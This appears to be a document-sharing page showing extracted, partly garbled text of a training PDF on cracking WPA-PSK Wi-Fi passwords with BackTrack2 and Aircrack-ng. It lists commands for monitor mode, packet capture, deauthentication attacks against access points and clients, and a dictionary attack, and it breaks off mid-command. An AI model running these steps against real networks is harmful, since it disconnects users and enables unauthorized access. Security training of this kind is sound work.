BackTrack2Linux下破解无线WPA.PDFVIP

  • 4
  • 0
  • 约3.72千字
  • 约 10页
  • 2018-12-31 发布于天津
  • 举报
BackTrack2Linux下破解无线WPA.PDF

Wireless Security Training BackTrack2 Linux WPA WPA-PSK Aircrack-ng Cowpatty WPA-PSK WPA-PSK AP LinksysDlinkTPLinkBelKin AP WPA-PSKTKIP B1 Aircrack-ng BackTrack2 Linux BT2 1BackTrack2 root toorBackTrack2 ShellShell startx USB USB PCMCIAPCI Shellifconfig -a rausb0 2Aircrack-ng 0.7 r214 AirCrack-ng 0.9.1r784 cd / cd pentest/wireless update-aircrack.sh Made By Christopher Yang Wireless Security Training aircrack-ng aircrack-ng 0.9.1 r784 ifconfig -a rausb0 up USB Made By Christopher Yang Wireless Security Training 33 WEP Kismet Airosnort AP airodump-ng rausb0 AP SSID monitor airmon-ng start rausb0 PCMCIAPCI USB Made By Christopher Yang Wireless Security Training aircrack-ng 0.9.1 4 airodump-ng -w ciw --channel 6 rausb0 ciw.cap WPA WEP —ivs 5WPA Deauthenticate Deauth WPA AP AP aireplay-ng -0 10 -a APs MAC rausb0 Made By Christopher Yang Wireless Security Training aireplay-ng -0 10 -a APs MAC -h Clients MAC rausb0 -0 Deauthenticate -a A P MAC -h MAC USB Deauth AP Made By Christopher Yang Wireless Security Training AP ping AP 6WPA WPA Brute Force AttackDictionary Attack BackTrack2 zcat /pentest/passwor

文档评论(0)

1亿VIP精品文档

相关文档